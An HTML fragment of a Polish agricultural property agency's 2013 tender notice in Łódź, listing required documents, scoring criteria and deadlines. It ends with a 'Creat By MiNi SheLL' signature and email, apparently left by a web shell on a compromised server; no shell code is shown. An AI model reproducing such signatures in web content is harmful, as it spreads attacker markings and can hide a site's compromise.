<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty musi być załączone pełnomocnictwo, o ile prawo do podpisania umowy nie wynika z innych dokumentów złożonych wraz z ofertą. Przyjmuje się, że pełnomocnictwo do złożenia oferty upoważnia również do poświadczenia za zgodność z oryginałem kopii wszystkich dokumentów składanych wraz z ofertą, chyba, że z treści pełnomocnictwa wynika co innego. Pełnomocnictwo składa się w oryginale lub kopii poświadczonej za zgodność z oryginałem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Okres udzielonej gwarancji jakości (powyżej 3 lat) - 20</li>
<li>3 - Termin wykonania robót (określony w odniesieniu do terminu zakończenia robót, podanego przez Zamawiającego) - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę treści zawartej umowy w zakresie jej realizacji pod warunkiem, że: 
a)	wystąpią czynniki zewnętrzne niezależne od Zamawiającego i Wykonawcy, które nie pozwalają na prawidłowe wykonanie zamówienia 
b) Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z   SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi ul. Północna 27/29, 91-420 Łódź, województwo łódzkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.08.2013 godzina 09:30, miejsce: Agencja Nieruchomości Rolnych Oddział Terenowy w Warszawie Filia w Łodzi ul. Północna 27/29, 91-420 Łódź, sekretariat pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com